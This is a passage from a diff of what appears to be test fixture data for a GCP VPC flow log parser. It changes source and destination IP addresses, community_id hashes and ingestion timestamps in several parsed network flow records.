_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", "end": "2019-06-14T03:49:49.549471457Z", @@ -17964,18 +17964,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 174524, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 66 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:BbTL9wZeHMC/sF82yUUcW/2D6CA=", + "community_id": "1:imhAHfiL2qAfW47Jd0enQw924sA=", "bytes": 174524, "name": "default", "transport": "tcp", @@ -17997,7 +17997,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
@@ -18034,8 +18034,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869087100Z", - "original": "{\"insertId\":\"19im82tfdygzng\",\"jsonPayload\":{\"bytes_sent\":\"174524\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33968,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965294083Z\",\"packets_sent\":\"66\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480272197Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392166400Z", + "original": 
"{\"insertId\":\"19im82tfdygzng\",\"jsonPayload\":{\"bytes_sent\":\"174524\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33968,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965294083Z\",\"packets_sent\":\"66\",\"reporter\":\"DEST\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480272197Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.480272197Z", "end": "2019-06-14T03:49:37.965294083Z", @@ -18064,17 +18064,17 @@ "as": { "number": 16509 }, - "address": "203.0.113.228", + "address": "67.43.156.13", "port": 9243, "bytes": 181624065, - "ip": "203.0.113.228", + "ip": "67.43.156.13", "packets": 28344 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:arV4D7RJIpRwsrWa/m7Q9mUVaPI=", + "community_id": "1:iY4jL+9QMjdSzot4PM7XduwgWhY=", "bytes": 181624065, "transport": "tcp", "type": "ipv4", @@ -18088,7 +18088,7 @@ }, "related": { "ip": [ - "203.0.113.228", + "67.43.156.13", "10.49.136.133" ] }, 
@@ -18113,8 +18113,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869089900Z", - "original": "{\"insertId\":\"19im82tfdygzo1\",\"jsonPayload\":{\"bytes_sent\":\"181624065\",\"connection\":{\"dest_ip\":\"10.49.136.133\",\"dest_port\":52780,\"protocol\":6,\"src_ip\":\"203.0.113.228\",\"src_port\":9243},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:58.592579489Z\",\"packets_sent\":\"28344\",\"reporter\":\"DEST\",\"rtt_msec\":\"91\",\"src_location\":{\"asn\":16509,\"city\":\"Boardman\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Oregon\"},\"start_time\":\"2019-06-14T03:40:17.183499423Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392171800Z", + "original": 
"{\"insertId\":\"19im82tfdygzo1\",\"jsonPayload\":{\"bytes_sent\":\"181624065\",\"connection\":{\"dest_ip\":\"10.49.136.133\",\"dest_port\":52780,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":9243},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"simianhacker-demo\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:58.592579489Z\",\"packets_sent\":\"28344\",\"reporter\":\"DEST\",\"rtt_msec\":\"91\",\"src_location\":{\"asn\":16509,\"city\":\"Boardman\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Oregon\"},\"start_time\":\"2019-06-14T03:40:17.183499423Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:17.183499423Z", "end": "2019-06-14T03:49:58.592579489Z", @@ -18141,17 +18141,17 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 51348, "bytes": 1460, - "ip": "192.0.2.117", + "ip": "192.168.2.117", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:B8rl49fY7/3p7swViLnHkXbZpvs=", + "community_id": "1:ALoeGJMuIEHJKbowB+FYTqIV3pc=", "bytes": 1460, "transport": "tcp", "type": "ipv4", @@ -18165,7 +18165,7 @@ }, "related": { "ip": [ - "192.0.2.117", + "192.168.2.117", "10.87.40.76" ] }, 
@@ -18190,8 +18190,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869092900Z", - "original": "{\"insertId\":\"19im82tfdygzo8\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.0.2.117\",\"src_port\":51348},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:20.754300982Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:20.630975303Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392177300Z", + "original": 
"{\"insertId\":\"19im82tfdygzo8\",\"jsonPayload\":{\"bytes_sent\":\"1460\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":51348},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:20.754300982Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:20.630975303Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:41:20.630975303Z", "end": "2019-06-14T03:41:20.754300982Z", @@ -18214,9 +18214,9 @@ "as": { "number": 4837 }, - "address": "192.0.2.12", + "address": "192.168.2.12", "port": 44128, - "ip": "192.0.2.12" + "ip": "192.168.2.12" }, "source": { "address": "10.73.186.17", @@ -18230,7 +18230,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:RFaj1p+IkzecdvmvndE30lJ6hLs=", + "community_id": "1:I5lhpPeiyo7KchAzF1nMGZkwF4k=", "bytes": 0, "transport": "tcp", "type": "ipv4", @@ -18245,7 +18245,7 @@ "related": { "ip": [ "10.73.186.17", - "192.0.2.12" + "192.168.2.12" ] }, "gcp": { 
@@ -18266,8 +18266,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869095900Z", - "original": "{\"insertId\":\"19im82tfdygzoa\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"192.0.2.12\",\"dest_port\":44128,\"protocol\":6,\"src_ip\":\"10.73.186.17\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Binzhou\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Shandong\"},\"end_time\":\"2019-06-14T03:45:22.081121292Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:22.080963433Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392182800Z", + "original": 
"{\"insertId\":\"19im82tfdygzoa\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"192.168.2.12\",\"dest_port\":44128,\"protocol\":6,\"src_ip\":\"10.73.186.17\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Binzhou\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Shandong\"},\"end_time\":\"2019-06-14T03:45:22.081121292Z\",\"packets_sent\":\"1\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"infraops-docker-data\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:22.080963433Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:45:22.080963433Z", "end": "2019-06-14T03:45:22.081121292Z", @@ -18288,10 +18288,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -18305,7 +18305,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:BbTL9wZeHMC/sF82yUUcW/2D6CA=", + "community_id": "1:imhAHfiL2qAfW47Jd0enQw924sA=", "bytes": 11137, "name": "default", "transport": "tcp", @@ -18328,7 +18328,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { 
@@ -18364,8 +18364,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869098700Z", - "original": "{\"insertId\":\"19im82tfdygzn7\",\"jsonPayload\":{\"bytes_sent\":\"11137\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965294083Z\",\"packets_sent\":\"95\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480272197Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392188500Z", + "original": 
"{\"insertId\":\"19im82tfdygzn7\",\"jsonPayload\":{\"bytes_sent\":\"11137\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.965294083Z\",\"packets_sent\":\"95\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.480272197Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.480272197Z", "end": "2019-06-14T03:49:37.965294083Z", @@ -18386,9 +18386,9 @@ "as": { "number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 54812, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -18402,7 +18402,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:iNSkH+XbFsPOGDVjlyGh+11nIrk=", + "community_id": "1:7gePYXWz+/zKghVHNYgmCfG2ZOE=", "bytes": 1776, "transport": "tcp", "type": "ipv4", @@ -18417,7 +18417,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { 
@@ -18441,8 +18441,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869101600Z", - "original": "{\"insertId\":\"19im82tfdygznf\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":54812,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:20.708994883Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:20.595119257Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392194Z", + "original": 
"{\"insertId\":\"19im82tfdygznf\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":54812,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:20.708994883Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:20.595119257Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:45:20.595119257Z", "end": "2019-06-14T03:45:20.708994883Z", @@ -18463,10 +18463,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33564, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -18480,7 +18480,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:50u5lJ2RV1XFEhO2zdhxvcEDnVw=", + "community_id": "1:PtUpNPLEJul/LK9u2JbGqtTKFB8=", "bytes": 21792, "name": "default", "transport": "tcp", @@ -18503,7 +18503,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -18539,8 +18539,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869104500Z", - "original": "{\"insertId\":\"19im82tfdygzni\",\"jsonPayload\":{\"bytes_sent\":\"21792\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33564,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597079770Z\",\"packets_sent\":\"186\",\"reporter\":\"SRC\",\"rtt_msec\":\"340\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866944869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392199500Z", + "original": 
"{\"insertId\":\"19im82tfdygzni\",\"jsonPayload\":{\"bytes_sent\":\"21792\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33564,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597079770Z\",\"packets_sent\":\"186\",\"reporter\":\"SRC\",\"rtt_msec\":\"340\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866944869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.866944869Z", "end": "2019-06-14T03:49:59.597079770Z", @@ -18563,9 +18563,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 49438, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -18579,7 +18579,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:XQBVj/qvQirewgJk7seie1WKY/s=", + "community_id": "1:Wx9CFh/CGkJ8gWbPZ6ib0K8z+zk=", "bytes": 74370, "transport": "tcp", "type": "ipv4", @@ -18594,7 +18594,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { 
@@ -18618,8 +18618,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869107400Z", - "original": "{\"insertId\":\"19im82tfdygzns\",\"jsonPayload\":{\"bytes_sent\":\"74370\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":49438,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220725956Z\",\"packets_sent\":\"580\",\"reporter\":\"SRC\",\"rtt_msec\":\"114\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.398463104Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392205Z", + "original": 
"{\"insertId\":\"19im82tfdygzns\",\"jsonPayload\":{\"bytes_sent\":\"74370\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":49438,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220725956Z\",\"packets_sent\":\"580\",\"reporter\":\"SRC\",\"rtt_msec\":\"114\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.398463104Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.398463104Z", "end": "2019-06-14T03:49:56.220725956Z", @@ -18646,18 +18646,18 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "bytes": 138337, "domain": "elasticsearch", - "ip": "198.51.100.248", + "ip": "67.43.156.14", "packets": 244 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:0T9pXVTCUZ37bK4xUSfPnYkUcHk=", + "community_id": "1:B/prlGvm/LDkdDcuN85b0JOuzto=", "bytes": 138337, "name": "default", "transport": "tcp", @@ -18679,7 +18679,7 @@ }, "related": { "ip": [ - "198.51.100.248", + "67.43.156.14", "10.87.40.76" ] }, 
